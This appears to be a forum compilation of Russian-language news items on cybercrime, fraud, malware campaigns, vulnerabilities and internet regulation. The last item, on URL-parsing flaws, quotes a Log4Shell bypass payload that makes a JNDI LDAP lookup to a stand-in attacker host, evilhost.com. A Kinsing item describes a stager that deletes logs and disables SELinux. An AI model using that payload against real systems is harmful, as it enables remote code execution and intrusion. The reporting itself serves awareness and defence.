— IP-адреса (!) компьютеров, с которых ведётся канал;
— Часть этих данных планируют сделать общедоступной;
— Реестр касается авторов в Telegram, Likee, TikTok, Twitter, YouTube, «ВКонтакте», «Одноклассники», LiveJournal, «Пикабу», Pinterest, Rutube, «Дзен», Twich, Discord, Yappy.
Закон вступает в силу 1 ноября — начинайте готовиться.
Сурс:
](https://www.rbc.ru/technology_and_media/05/09/2024/66d9e07a9a794761908bbe1a)
Роскомнадзор предложил включать в реестр страниц соцсетей с 10 тыс. подписчиков данные о владельце страницы и ее администраторах, в том числе номера их телефонов, адреса электронных почт и IP-адреса
www.rbc.ru
Граничащие с Россией страны получили предупреждение об огромных штрафах от
руководства Visa.
Руководство Visa разослало предупреждение по электронной почте банкам стран,
граничащих с Россией. Она пообещала штраф в размере 1 млн. долларов за каждую
карту для тех, кто не выполнит её требования,
пишет "Mash".
Так, тем, у кого есть паспорта России, но не проживающим в Эстонии, Латвии, Литве или Польше и других странах, в том числе и Казахстане, запрещено выдавать карты. Источник в банке заявил, что требование касается всех граждан России в целом.
Тем временем Нацбанк Казахстана опубликовал на сайте проект поправок, касающийся выпуска платёжных карточек иностранцам, [пишет](https://www.zakon.kz/pravo/6411698-trebovaniya-k-vydache-platezhnykh- kartochek-uzhestochat-v-kazakhstane.html) "Zakon.kz".
Разработчики проекта намерены ужесточить условия выдачи пластиковых карт. Получить платёжную карту можно будет только лично на основании документов, подтверждающих законные основания для пребывания на территории Казахстана: имеется ввиду трудовой договор, договор на обучение, вид на жительство, разрешение на временное или постоянное пребывание.
Ранее для открытия банковского счёта и получения карты в Казахстане было достаточно стать обладателем индивидуального идентификационного номера.
Источник: [https://kz.tsargrad.tv/news/visa-za...dlja-russkih-kazahstan- obnovil-pravila_896167](https://kz.tsargrad.tv/news/visa-zapretila-otkryvat- scheta-dlja-russkih-kazahstan-obnovil-pravila_896167)
МВД предложило внести в закон "Об оперативно-розыскной деятельности" поправки, которые позволят силовикам получать без решения суда доступ к электронным устройствам граждан и данным, передаваемым через интернет.
Законопроект размещен на портале правовых актов.
МВД обосновывает необходимость поправок ростом количества киберпреступлений. Расследование 71% уголовных дел по киберпреступлениям приостановлено из-за того, что силовики не могут определить преступника.
Это происходит потому, что электронные сведения на удаленном сервере могут оказаться поврежденными, искаженными или уничтоженными злоумышленниками, вследствие чего правоохранители теряют доказательную базу, что затрудняет установление преступников.
Поправки позволят силовикам получать удаленный доступ к дата-центрам, облачным
хранилищам, операторам связи и устройствам граждан.
Сейчас доступ к электронным данным защищен статьей Конституции о тайне
переписки.
source: regulation.gov.ru/Regulation/Npa/PublicView?npaID=140881
Фишеры нацелились на ваши деньги, господа. [Ссылка тыц](https://www.bitdefender.com/blog/hotforsecurity/new-flipper-zero- phishing-campaign-targets-infosec-community/)
Новая фишинговая кампания продвигает поддельные веб-сайты,
рекламирующие популярный инструмент кибербезопасности Flipper Zero,
в качестве приманки для привлечения инфосеков.
Мошеннические веб-сайты почти идеально воспроизводят оригинальную версию
что может сбить с толку потенциальных жертв (хакеры-жертвы
)
и увеличить шансы на успешную атаку.
Flipper Zero - популярное устройство в сообществе кибербезопасности.
Карманный инструмент имитирует любимую детскую игрушку,
но обладает мощными возможностями, начиная от клонирования RFID-ключа
и заканчивая низкочастотной, инфракрасной и Bluetooth-связью.
Менялы развели на 11 тысяч долларов жителя Владивостока — он сам нашёл их в интернете и принёс деньги.
47-летний приморец семь лет копил доллары, а недавно решил — время пришло, и начал искать обменник. Только вместо банка нашёл покупателя валюты в интернете — договорились встретиться на Русской.
Когда к нему в машину сел 18-летний меняла с другом, подозрений не возникло. Всё шло как надо, пока мужчина не получил струю из газового баллончика в лицо — товарищи схватили наличные и скрылись. Одного уже поймали, второго ищут. Им грозит столько же лет колонии, сколько потерпевший копил "зелень".
source: mash.ru/khv/news/161150
На протяжении 2020 – 2021 года предприниматель из Харькова, не имея соответствующей лицензии НБУ, предоставлял в Интернете услуги по вводу и выводу электронных денег (в гривне, долларах и рублях) из российских платежных систем «Qiwi Wallet», «Яндекс.Деньги» и «WebMoney Transfer», за что брал с клиентов вознаграждение, в виде комиссии.
Для этой цели он самостоятельно разработал сайт, на котором размещал данные о курсах обмена и доступном размере резерве валюты. К услугам обменника прибегали различные фрилансеры и интернет-предприниматели, которые нелегально сотрудничают с российскими резидентами и получают (или платят) им гонорары. На сегодняшний день не существует законных возможностей делать это, тем не менее, спрос на подобные услуги никуда не исчезает.
Регистрация данных платежных систем в Украине была отменена после начала российской военной агрессии в 2014 году, в результате чего их деятельность оказалась вне закона, поскольку, согласно Постановлению НБУ №481 от 4.11.2010, заниматься переводом денег в Украине имеют право только компании, получившие соответствующую лицензию и добавленные в список разрешенных.
Более того, позднее, специальным решением СНБО от 21.06.2018 «О внесении изменений к персональным специальным экономическим и другим ограничительным санкциям», деятельность этих компаний на территории Украины была напрямую запрещена.
Чтобы обойти законодательные ограничения, интернет-валютчик внедрил на сайте систему интернет-эквайринга, с помощью которой получал от клиентов деньги с украинских банковских карт. Кошельки российских платежных систем, подконтрольные ему, были зарегистрированы на номер российского мобильного оператора «Мегафон».
Узнав о работе нелегального обменника, правоохранители, в рамках оперативного расследования, инициировали пополнение кошельков систем «Qiwi Wallet» и «Яндекс.Деньги» на суммы, эквивалентные нескольким тысячам гривен. Успех этих операций позволил приобщить их результаты к доказательной базе стороны обвинения.
В результате проведенного по месту жительства обыска, полицейские изъяли у валютчика компьютерную технику и несколько смартфонов, с доступом к электронным кошелькам запрещенных платежных систем, 6 карточек украинского Приватбанка, 1 карту российского Сбербанка, карты Monobank и Яндекс.Деньги, пачку стартовых пакетов украинских мобильных операторов, блокноты с записями операций и наличные деньги в размере 32,3 тыс. грн, 879 долл., 135 евро и 750 российских рублей.
Харьковчанину инкриминировали нарушение ч.1 ст. 200 УКУ (неправомерное использование электронных денег). Санкции данной статьи предусматривают наказание штрафом в размере от 3 до 5 тысяч необлагаемых налогом минимумов дохода граждан. Однако, учитывая, что подсудимый впервые совершил правонарушение и чистосердечно признал свою вину, суд счел проступок нетяжким и применил наказание ниже установленной границы - всего 2 тысячи необлагаемых минимумов (38,250 грн + 8,237 грн расходов на экспертизы).
Житель города Белгород-Днестровский, Одесской области, поддался соблазну дополнительного заработка, невзирая на сомнительное происхождение последнего. Он познакомился через интернет с неизвестным хакером, который предложил помочь ему с выводом денег, полученным незаконным путем, за вознаграждение.
Упомянутый хакер из Одессы занимался вымогательством денег у интернет- пользователей различными способами. Одной из использовавшихся мошеннических схем была работа компьютерного вируса, который блокировал работу зараженного компьютера и требовал у его владельца перевести деньги на указанные реквизиты.
Еще несколько сценариев включали создание мошеннических сайтов, копирующих известные обменники криптовалюты. На этих сайтах сообщалось, что открытых заявок нет, но оператор онлайн-чата предлагал посетителям помощь в приобретении желаемого количества биткойнов, если они перечислят ему деньги на карту.
Роль, которая была отведена соучастнику из Белгород-Днестровского – это предоставить реквизиты своей банковской карты, время от времени получать на нее платежи, обналичивать через банкомат и переводить деньги хакеру-мошеннику, за вычетом условленной комиссии. Стандартная работа «дропа» - мелкого участника цепочки отмывания криминальных денег.
Естественно, в своем распоряжении, интернет-мошенники имеют множество подобных «помощников», так как рано или поздно их скомпрометированные реквизиты блокируются банками и попадают в поле зрения правоохранителей.
В общей сложности, дроп из Одесской области успел получить от хакера на свою карту всего 5 платежей на сумму немногим более 14 тысяч гривен. Часть этих денег он успешно отправил хакеру через терминалы и платежные системы, но другая часть зависла на карте, потому что служба безопасности «Укрсоцбанка», выпустившего карту белгород-днестровца, успела заблокировать его счет из-за жалоб потерпевших на мошеннические действия.
Когда компетентные органы пригласили мужчину для беседы, он полностью признал свою вину и вызвался добровольно компенсировать ущерб, причиненный потерпевшим. Ущерб был компенсирован в полном объеме, о чем обвиняемый представил соответствующие платежные квитанции.
Суд квалифицировал соучастие обвиняемого в преступлении, как правонарушение по ч.3 ст. 190 УК (мошенничество в крупных размерах или с применением электронно- вычислительной техники). Санкции этой статьи предполагают лишение свободы, сроком от 3 до 8 лет.
Однако, приняв во внимание чистосердечное раскаяние, а также личность обвиняемого (наличие высшего образования, постоянной работы и крепких социальных связей), судья назначил ему минимально возможный срок лишения свободы - 3 года, с отсрочкой исполнения на период испытательного срока 1 год.
Вредоносная программа для Android, известная всем под именем Joker, никак не отпускает Google Play Store. На этот раз авторы зловреда вернулись с целым набором новых трюков, помогающих Joker обойти сканеры официального магазина приложений.
«Джокер» известен экспертам с 2017 года. Вот уже четыре года тактика авторов вредоноса остаётся неизменной: Joker маскируют под легитимные приложения вроде игр, мессенджеров, редакторов фото, программ-переводчиков и обоев для рабочего стола.
Как только Joker попадает в систему, он начинает незаметно для пользователя имитировать клики, перехватывать СМС-сообщения и подписывать жертву на платные сервисы. Такие мобильные вредоносы получили отдельную категорию — fleeceware.
Как правило, жертва даже не подозревает о наличии вредоносного софта до того момента, как ей не приходит счёт на крупную сумму. Также fleeceware может передавать оператору сообщения, список контактов и информацию об устройстве.
С 2019 года Joker не раз проникал в Google Play Store, поскольку его авторы постоянно вносят мелкие детали в свою схему. Поэтому и наблюдались такие явления, как периодические волны атак «Джокера» на пользователей официального магазина. По данным специалистов Zimperium, за последние четыре года из Play Store удалили более 1800 приложений, заражённых Joker.
«Создатели вредоноса регулярно находят и воплощают новые методы обхода защитных барьеров Play Store. Рано или поздно зловреда, конечно, обнаруживают, однако он в очередной раз демонстрирует, насколько часто такой софт может модифицироваться — игра в "Кошки-мышки"», — пишет Zimperium в отчёте.
Последние версии Joker отмечались старанием скрыть истинные намерения приложения. В этом авторам вредоноса помогает инструмент для разработчиков с открытым исходным кодом — Flutter. При использовании этого набора даже вредоносный код будет выглядеть для сканеров как безобидный.
Помимо этого, «Джокер» за последнее время научился встраивать пейлоад в качестве .DEX-файла, который обфусцируется разными методами. Как правило, злоумышленники прибегают к стеганографии, где изображение хранится на удалённом командном сервере (C2).
Чтобы спрятать URL командного центра, киберпреступники используют специальные сервисы для сокращения ссылок.
• Source: https://blog.zimperium.com/joker-is-still-no-laughing-matter/
В начале текущей недели ИБ-специалист и создатель сервиса ID-Ransomware Майкл Гиллеспи предупредил о появлении нового шифровальщика Qlocker, нацеленного на устройства компании Qnap.

Создатели Qlocker используют 7-zip и перемещают файлы на устройствах Qnap в архивы, защищенные паролем. Так, сначала файлы оказываются заблокированы, а QNAP Resource Monitor отображает многочисленные процессы «7z».

Когда же вымогательская малварь завершает работу, файлы помещаются в защищенные паролем архивы с расширением .7z . Для их распаковки жертвам потребуется ввести пароль, известный только злоумышленнику. Пострадавшим оставляют записку с требованием выкупа (файл !!! READ_ME.txt), в тексте которой можно найти уникальный клиентский ключ, который жертвы должны ввести для входа на Tor-сайт вымогателя.
Издание Bleeping Computer пишет, что жертвам предлагается заплатить 0,01 биткойна (примерно 557,74 доллара), чтобы получить пароль для своих заархивированных файлов.

В начале недели ИБ-специалист Джек Кейбл нашел в малвари ошибку, которая позволяла пользователям бесплатно спасти свои файлы. Дело в том, что жертвы могли попросить идентификатор биткоин-транзакции у другого пострадавшего, который уже заплатил выкуп, и немного изменить его. Такие измененные идентификаторы все равно срабатывали на сайте злоумышленников, и жертвы получали пароль для расшифровки своих файлов.
Эксперт в частном порядке помогал людям получать пароли, а компания Emsisoft приняты меры для создания специальной справочной системы, которая помогала людям эксплуатировать эту брешь. Но, к сожалению, вскоре преступники тоже обнаружили баг и внесли исправления в свой код. Более этот метод не работает. Исследователь успел помочь примерно 50 пострадавшим.
__https://twitter.com/x/status/1385112173974745091
Разработчики Qnap уже опубликовали бюллетень безопасности, посвященный этим атакам. Оказалось, что преступники использовали критическую уязвимость, которая позволяла им проникать на устройства Qnap NAS. А уязвимостей в своих сетевых устройствах производитель исправил сразу несколько.
Наиболее серьезная проблема получила идентификатор CVE-2021-28799 и была обнаружена в составе утилиты Hybrid Backup Sync (HBS), предназначенной для аварийного восстановления и резервного копирования данных. Баг представлял собой жестко закодированные учетные данные (то есть, по сути, бэкдор-аккаунт). Компания завила, что ошибка уже исправлена в новых версиях HBS, и рекомендует клиентам как можно скорее обновить ПО до актуальной версии:
Хотя, казалось бы, проблема CVE-2021-28799 была устранена только вчера, в примечаниях к релизу версии 16.0.0415 сказано, что уязвимость исправлена почти неделю назад, 16 апреля 2021 года. Представители Qnap сообщили журналистам, что задержка раскрытия информации о баге потребовалась для подготовки и выпуска патчей для QuTS hero и QuTScloud HBS. Также в Qnap подчеркнули, что еще недавно команда безопасности PSIRT не обнаружила каких-либо доказательств активной эксплуатации этой уязвимости.
Также производитель исправил и две другие уязвимости, связанные с инъекциями команд в HBS, а также еще две критические проблемы: ошибку инъекций команд в QTS и QuTS hero (CVE-2020-2509), а также SQL-инъекции в Multimedia Console и Media Streaming Add-On (CVE-2020-36195). Эти баги тоже позволяли злоумышленникам получить полный доступ к NAS.
По мнению разработчиков, Qlocker использует какую-то их этих проблем для своих атак и шифрования данных на уязвимых устройствах.
Пользователям стоит как можно скорее обновить Multimedia Console, Media Streaming Add-on и Hybrid Backup Sync на своих устройствах, а также загрузить последнюю версию Malware Remover и проверить систему на наличие вредоносов.
Также рекомендуется изменить сетевой порт веб-интерфейса с 8080, установленного по умолчанию, на любой другой, и использовать надежные и уникальные пароли.
По данным экспертов и СМИ, за последнюю неделю участились атаки другого ранее известного шифровальщика, eCh0raix, так же нацеленного на Qnap NAS.
Так, Майкл Гиллеспи сообщил изданию The Record, что авторы eCh0raix могли
найти и использовать те же самые ошибки, что и операторы Qlocker, и именно
этим объявляется недавний всплеск активности малвари.

Источник: xakep.ru/2021/04/23/qlocker/
Индийский ИБ-исследователь Ананд Пракаш (Anand Prakash), основатель PingSafe AI, обнаружил проблему, связанную с популярным iOS-приложением Call Recorder для записи телефонных звонков. Согласно официальной статистике, это приложение уже загрузили более миллиона раз.
В своем блоге специалист рассказывает, что, просто зная номер телефона пользователя, любой мог получить доступ к записанным разговорам. Дело в том, что эксперт нашел облачное хранилище приложения в AWS, вместе с именами хостов и конфиденциальными данными, которые использовал Call Recorder.
Оказалось, что при помощи Burp Suite Пракаш мог просматривать и изменять входящий и исходящий сетевой трафик приложения. Так как API не выполнял никакой аутентификации, фактически Пракаш имел возможность подменить свой номер телефона, зарегистрированный в приложении, на номер любого другого пользователя и получить доступ к записям чужих разговоров.
В обнаруженном хранилище содержались более 130 000 записей, общим объемом около 300 гигабайт.
Журналисты издания TechCrunch связались с разработчиком Call Recorder и сообщают, что в настоящее время баг был исправлен, и хранилище более недоступно. Новая версия приложения была выпущена в App Store еще в минувшие выходные.
Источник: xakep.ru/2021/03/10/call-recorder-bug/
51-летний Дэвид Гилберт Саффрон из Австралии и 52-летний Винсент Энтони Маццотта из Лос-Анджелеса предстали перед судом по обвинению в мошенничестве, отмывании денег и создании финансовой пирамиды.
Они обещали хомячкам, что будут использовать технологии ИИ и автоматизированных ботов для получения сверхприбыли — до 300% в течение 3 недель (что эквивалентно 186 000 000%).
В итоге собрали от жертв не менее $11 000 000. Однако эти средства пошли на роскошную жизнь.
Злоумышленники придумали еще одну хитрость — они создали Federal Crypto Reserve и предлагали вернуть средства в обмен на плату за «расследование».
source: justice[.]gov/opa/pr/two-men-charged-operating-25m-cryptocurrency- ponzi-scheme
Китайский фильм «Ставок больше нет» (No More Bets) за 2 недели собрал $355 000 000 и стал лидером продаж на видеоплатформе Maoyan. Фильм рассказывает о кибермошенничестве в вымышленном городе Цзяньань в Юго-Восточной Азии.

Фильм получил высокую оценку зрителей — 9,2 из 10. Он не содержит ни одного персонажа из комиксов или мифических героев, а основан на реальных случаях кибермошенничества, которые происходят в Азии.
Фильм стал отражением всеобщей озабоченности в Китае проблемой кибермошенничества, которая угрожает конфиденциальности данных граждан и национальной безопасности.
source: scmp.com/news/china/politics/article/3231683/no-more-bets-surprise- chinese-summer-movie-hit-about-cybercrime
Так как патчи для проблем ProxyLogon по-прежнему установили не все, уязвимые серверы Microsoft Exchange продолжают атаковать злоумышленники. Теперь исследователи из компании Cybereason Nocturnus обнаружили ботнет Prometei, который добывает криптовалюту Monero на уязвимых машинах.
В начале марта 2021 года инженеры Microsoft выпустили внеплановые патчи для четырех уязвимостей в почтовом сервере Exchange, которым исследователи дали общее название ProxyLogon (CVE-2021-26855, CVE-2021-26857, CVE-2021-26858 и CVE-2021-27065).
Эти уязвимости можно объединить в цепочку, а их эксплуатация позволит злоумышленнику пройти аутентификацию на сервере Exchange, получить права администратора, установить малварь и похитить данные.
Уже в марте атаки на уязвимые серверы совершали более 10 хак-групп, разворачивая на серверах веб-шеллы, майнеры и шифровальщики.
Согласно статистике, опубликованной Microsoft в прошлом месяце, примерно 92% всех подключенных к интернету серверов Exchange уже получили патчи.
Click to expand...
Впервые эта модульная малварь была обнаружена еще в прошлом году. Она способна заражать системы под управлением Windows и Linux, и ранее использовала эксплоит EternalBlue для распространения по скомпрометированным сетям и взлома уязвимых машин.
Эксперты Cybereason Nocturnus и вовсе пишут, что Prometei активен как минимум 2016 года (судя по образцам, загруженным на VirusTotal). Недавно ботнет был обновлен и «научился» эксплуатировать уязвимости ProxyLogon. Таким образом, теперь Prometei атакует серверы Exchange, а затем устанавливает на них пейлоды для майнинга, а также старается распространиться дальше по зараженной сети при помощи эксплоитов EternalBlue и BlueKeep, обнаруженных учетных данных и модулей для SSH или SQL.
Обновленная малварь обладает возможностями бэкдора с поддержкой обширного набора команд, включая загрузку и выполнение файлов, поиск файлов в зараженных системах и выполнение программ или команд от имени злоумышленников.

«При желании злоумышленники могут заразить скомпрометированные эндпоинты другими вредоносными программами и сотрудничать с операторами шифровальщиков, продавая им доступ к системам», — предупреждают исследователи.
Click to expand...
Источник: xakep.ru/2021/04/23/prometei-2/
Кто-нибудь знает об этой утечке данных или имеет эту утечку данных
On the News- <https://news.yahoo.com/iranian-president-hacked-group- claims-172323342.html>
Эксперты Trend Micro и Aqua Security зафиксировали новые атаки на Linux-
серверы с целью скрытной добычи криптовалюты. Ботоводы Kinsing ищут
непропатченный софт Oracle WebLogic Server, а кто-то, похожий на сгинувшую
TeamTNT, — ошибки в настройках Docker-демона.
В ходе атак на WebLogic операторы ботнета Kinsing проводят сканирование на
наличие уязвимостей, как недавних, так и более старых. Из последних
злоумышленники наиболее часто ищут RCE двухлетней давности — CVE-2020-14882.
В случае успешной отработки эксплойта на сервер устанавливается шелл-скрипт,
работающий как промежуточный загрузчик. Этот стейджер вначале готовит почву
для криптоджекинга: повышает лимит расхода ресурсов (с помощью команды
ulimit), удаляет журнал /var/log/syslog, отключает защиту вроде SELinux и
агенты облачных служб Alibaba и Tencent, прибивает процессы сторонних
майнеров.
После всех этих непрошеных действий на машину загружается (с удаленного
сервера) вредонос Kinsing. Чтобы обеспечить ему постоянное присутствие, шелл-
скрипт создает новое задание cron.
[](https://www.anti-
malware.ru/files/image1kinsing_weblogic_atks.png)
Атаки, зафиксированные на ловушках Aqua Security, различны, но по стилю и
используемым инструментам напоминают вылазки TeamTNT. (В ноябре прошлого года
эта криминальная группа свернула свои операции.)
Особенно заинтересовала аналитиков атака, нацеленная, судя по всему, на
использование чужих мощностей для взлома алгоритма на эллиптических кривых
(ECDLP secp256k1); успех в этом случае позволит получить ключи от любого
криптокошелька. Хакеры ищут плохо сконфигурированные Docker-демоны, чтобы
развернуть alpine — стандартный образ контейнера, который затем используется
для загрузки на C2 шелл-скрипта в режиме командной строки.

Задачи других атак более прозаичны. В одном случае злоумышленники ищут
уязвимые серверы Redis, чтобы установить майнер, в другом — Docker API,
пригодные для внедрения бэкдора Tsunami.
Компания Microsoft объявила, что начнет выпускать Windows 11 с 5 октября 2021 года. Сначала новая ОС появится на новых ПК (и компьютерах в магазинах, на которые Windows 11 будет предустановлена), а затем, в течение следующих девяти месяцев, будет распространена и на другие поддерживаемые машины.
Также сообщается, что поддержка Android-приложений на базе технологий Amazon, которая появится в Windows 11, не будет готова к этому времени. Но Microsoft предложит «предварительную версию [приложений Android в Microsoft Store] для Windows Insider в ближайшие месяцы».
Как и обновления Windows 10, Windows 11 будет поэтапно распространяться через Windows Update, но большинство компьютеров не «увидят» и не получат это обновление автоматически 5 октября. Microsoft объясняет, что новые ПК будут обновлены первыми, а за ними последуют более старые совместимые машины, очередность которых будет определена специальными «интеллектуальными моделями, учитывающими соответствие оборудования требованиям, показатели надежности, возраст устройств и другие факторы». В конечном итоге все совместимые компьютеры должны получить обновление к середине 2022 года.
Как и в случае с обновлением до Windows 10, пользователи смогут загрузить файл ISO, чтобы осуществить обновление самостоятельно. Напомню, что ранее стало известно, что Microsoft не будет запрещать установку Windows 11 на неподдерживаемые машины, однако в компании предупредили, что делать этого не рекомендуется. В Microsoft считают, что «Windows 10 — правильный выбор» для старых систем, и напоминают, что Windows 10 будет получать обновления безопасности до 14 октября 2025 года, а осень текущего года запланирован релиз Windows 10 21H2.
Источник: https://xakep.ru/2021/09/01/win-11-date/
Преступные группы в Европе активно используют мошенничество с QR-кодами (квишинг) для обмана туристов. Исследователи Netcraft сообщили, что две крупные банды злоумышленников применяют схемы с QR-кодами для оплаты парковки, распространяя их по Великобритании и другим странам.
Мошенники размещают поддельные QR-коды на парковочных автоматах, перенаправляя людей на фальшивые сайты, где запрашивают личные данные и информацию о банковских картах. Это не только приводит к краже средств, но и грозит штрафами за неоплаченную парковку.
Первый сигнал о новой угрозе прозвучал в августе, когда британская страховая компания RAC предупредила водителей быть осторожными и оплачивать парковку только через официальные приложения или наличными. По оценкам компании, только за последние два месяца с момента выхода предупреждения от этих схем пострадало более 10 000 человек.
Распространённость такого рода мошенничества постепенно выходит и за пределы Европы. Так, США и Канада также начинают сталкиваться с этой проблемой. ФБР уже выпустило предупреждение об угрозе со стороны киберпреступников, которые используют QR-коды для кражи средств у пользователей.
В Великобритании мошенники начали с наклеек с QR-кодами в центре Лондона, а затем схема распространилась на такие города, как Блэкпул, Брайтон, Портсмут и Абердин. Особый акцент мошенники делают на туристов, не знакомых с местными парковочными системами.
Один из преступных синдикатов маскируется под приложение PayByPhone. Пользователи сканируют поддельные коды, вводят данные о машине и банковской карте, а сайт подтверждает успешную оплату. Однако на самом деле деньги отправляются мошенникам.
По данным исследователей, все мошеннические сайты имеют схожие признаки: они зарегистрированы через регистратора доменных имён NameSilo и используют домены «.info», «.click», «.live» и другие. Для маскировки мошеннической активности поддельные сайты также используют защиту от Cloudflare.
Роберт Дункан из Netcraft отмечает, что бизнесам сложно защититься от таких атак, так как мобильные устройства менее защищены по сравнению с компьютерами. Однако использование специализированных платформ для защиты брендов может помочь выявить угрозы на ранней стадии. Эксперты рекомендуют избегать сканирования неизвестных QR-кодов и скачивать приложения только из официальных магазинов.
туристов ](https://www.securitylab.ru/news/552232.php)
От новейших методов мошенников не застрахованы даже опытные пользователи.
 www.securitylab.ru
Group-IB обнаружила новый троян для iOS, предназначенный для кражи биометрических данных, документов, удостоверяющих личность пользователей, а также для перехвата SMS.
Троян, который был назван GoldPickaxe.iOS подразделением Threat Intelligence компании Group-IB, был приписан китайскому хакеру под ником GoldFactory, ответственному за разработку набора сложных банковских троянов. В список входят ранее обнаруженный GoldDigger и недавно идентифицированные GoldDiggerPlus, GoldKefu и GoldPickaxe для Android.
В дальнейшем злоумышленники используют украденные биометрические данные, применяя сервисы искусственного интеллекта для создания дипфейков, которые своё лицо позволяют подменять лицом жертвы.
Киберпреступники могут использовать этот метод для получения несанкционированного доступа к банковскому счёту жертвы — это новый метод мошенничества, ранее не встречавшийся исследователям Group-IB. Трояны GoldFactory нацелены на Азиатско-Тихоокеанский регион, в частности на Таиланд и Вьетнам, выдавая себя за местные банки и правительственные организации.
Стоит отметить, что это редкий случай вредоносного ПО, нацеленного на мобильную операционную систему Apple.
Spoiler: Источник
](https://www.ixbt.com/news/2024/02/16/iphone-ios-goldpickaxe.html)
Group-IB обнаружила новый троян для iOS, предназначенный для кражи биометрических данных, документов, удостоверяющих личность пользователей, а также для перехвата SMS.
www.ixbt.com
В Рязанской области мужчину приговорили к 11,5 годам колонии за наркоторговлю и легализацию незаконных доходов в биткоинах в особо крупном размере.
Решение принял Рязанский областной суд. Ранее по этому делу Рязанский областной суд вынес оправдательный приговор, но в июне его отменил Верховный суд.
«Подсудимый путем переводов с использованием сети Интернет получил на виртуальный счет денежные средства в виде виртуальной криптовалюты биткоин, эквивалентной сумме не менее 8 240 278 рублей 69 копеек, в качестве вознаграждения за незаконное серийное производство наркотического средства в особо крупном размере», — заявили в прокуратуре.
Областной суд посчитал, что это не является легализацией доходов, полученных преступным путем. Но прокуратура не согласилась.
«Суд назначил наказание в виде лишения свободы, окончательно по совокупности преступлений определив срок к отбытию в виде 11 лет 6 месяцев в исправительной колонии строгого режима», — добавили в прокуратуре.
source: epp.genproc.gov.ru/web/proc_62/mass-media/news?item=90454396
Группировку из 39 китайских кардеров арестовали во время совместного отдыха на Шри-Ланке
Полиция Шри-Ланки произвела массовый арест на туристическом курорте Калувамодара, который расположен близ города Алутгама. В ходе рейда, как уточняет местное издание The Sunday Times, были задержаны сразу 39 человек, все они — граждане Китая.
Поводом для спецоперации послужила информация целого ряда посольств, которые поделились своими данными с местными силовиками. Все арестованные — члены одной и той же мошеннической группировки, которая промышляла кражами денег с банковских счетов граждан целого ряда стран. Согласно версии следствия, на Шри-Ланку они прибыли в качестве туристов и были арестованы в одном и том же отеле.
Для их доставки в полицейский участок Алутгамы пришлось нанимать частный автобус. В ходе обысков у граждан Китая изъяли большое количество техники — компьютеры и дорогие смартфоны, — а также крупную сумму наличными. После ареста их не удалось допросить, проблему решили лишь спустя сутки, найдя переводчика. Расследование продолжается, а местная прокуратура готовится передать дело в суд.
Жительница Краснодарского края вкладывалась в USDT, скопила непло*** сумму и решила обналичить. Выложила в соцсети объявление: продаю криптовалюту за 196,5 тысячи евро. Сделку решили провести в Екатеринбурге. У девушки как раз был знакомый из Екатеринбурга, который согласился съездить забрать наличку за неё. В назначенный момент приехали покупатели — два мужчины — и передали кеш. Девушка в ответ кинула крипту на кошелёк покупателя. Но позже выяснилось, что все переданные почти 200 тысяч евро — подделка.
Криптомиллионеров быстро нашли — силовики нагрянули к ним в четырёхзвёздочный отель в центре Екатеринбурга. Покупателями оказались два мужчины из Казани. Безработный нанял кладовщика Wildberries в качестве "охранника" за 50k, чтобы тот добавлял ему серьёзности во время сделки.
Интересно, что злоумышленники сами выложили в сеть необходимые ключи шифрования.
Исследователи из Лаборатории Касперского недавно обнаружили утечку на одном из русскоязычных хакерских форумов. Злоумышленники из группировки, отслеживаемой под названием MeowCorp, добровольно опубликовали большой пакет данных, состоящий из 258 закрытых ключей шифрования, исходного кода и некоторых предварительно скомпилированных дешифраторов от модифицированной версии программы-вымогателя Conti. Хакеры сообщили, что прекращают свою деятельность, поэтому и выкладывают вышеуказанные данные.
За последний год конкретно эта вариация вымогательского вредоноса использовалась в атаках на различные частные и общественные организации в разных странах. Согласно данным, полученных Лабораторией Касперского, можно предположить, что модифицированный MeowCorp штамм вымогателя Conti использовался для шифрования 257 жертв, лишь 14 из которых заплатили злоумышленникам за восстановление заблокированных данных.
Вполне вероятно, что слитые данные — лишь часть от всех атак MeowCorp, однако сами хакеры в своём сообщении на форуме утверждают, что опубликованные ключи включают всех пострадавших от шифрования жертв.
Лаборатория Касперского оперативно добавила слитые ключи в свой дешифратор Rakhni Decryptor. Теперь, по словам специалистов, программа может восстанавливать файлы, зашифрованные вариацией вымогателя Conti, используемой в атаках MeowCorp.
Загрузить Rakhni Decryptor последней версии можно с официального сайта Лаборатории Касперского. Там же доступна подробная инструкция по расшифровке заблокированных файлов.
source:
usa.kaspersky.com/about/press-releases/2023_kaspersky-releases-tool-for-
decrypting-conti-based-ransomware
noransom.kaspersky.com/
support.kaspersky.com/common/disinfection/10556#block1
Было выявлено восемь уязвимостей в библиотеках, написанных на языках C, JavaScript, PHP, Python и Ruby.
Исследователи в области кибербезопасности из компаний Claroty и Synk [выявили](https://claroty.com/2022/01/10/blog-research-exploiting-url-parsing- confusion/) уязвимости в 8 различных библиотеках для парсинга URL-адресов. Обнаруженные несоответствия и путаницы можно использовать для обхода проверок и создания широкого спектра векторов атак.
В общей сложности было выявлено восемь уязвимостей в библиотеках, написанных на языках C, JavaScript, PHP, Python и Ruby и используемых несколькими web- приложениями.
«Путаница при синтаксическом анализе URL-адресов может привести к неожиданному поведению программного обеспечения (например, web-приложения) и может быть использована злоумышленниками для создания условий отказа в обслуживании, утечки информации или, возможно, для проведения атак с удаленным выполнением кода», — пояснили исследователи.
Различия в том, как библиотеки синтаксического анализа интерпретируют запрос URL-адреса, могут представлять значительный риск для пользователей. В качестве примера можно привести критическую уязвимость Log4Shell , обнаруженную в прошлом году в библиотеке Log4j. Контролируемая злоумышленником строка при оценке и регистрации уязвимым приложением приводит к поиску JNDI, который подключается к серверу злоумышленника и выполняет произвольный Java-код.
Хотя Apache Software Foundation (ASF) быстро выпустила исправление для
устранения уязвимости в своей библиотеке Apache Log4j, вскоре выяснилось, что
меры по предотвращению эксплуатации можно обойти с помощью специально
созданного ввода в формате «${jndi:ldap://127.0.0[.] 1#.evilhost.com:1389/a}
».
«Обход связан с тем, что внутри процесса поиска JNDI использовались два разных (!) анализатора URL-адресов — один анализатор для проверки URL-адреса, а другой для его извлечения. В зависимости от того, как каждый анализатор обрабатывает часть фрагмента (#) URL-адрес, компонент Authority также меняется», — сказали исследователи.
В частности, если ввод обрабатывается как обычный URL-адрес HTTP, компонент Authority (комбинация имени домена и номера порта) заканчивается при обнаружении идентификатора фрагмента, тогда как при обработке в качестве URL- адреса LDAP анализатор назначит весь «127.0.0[.]1#.evilhost.com:1389» в качестве центра, поскольку спецификация URL-адреса LDP не учитывает фрагмент.
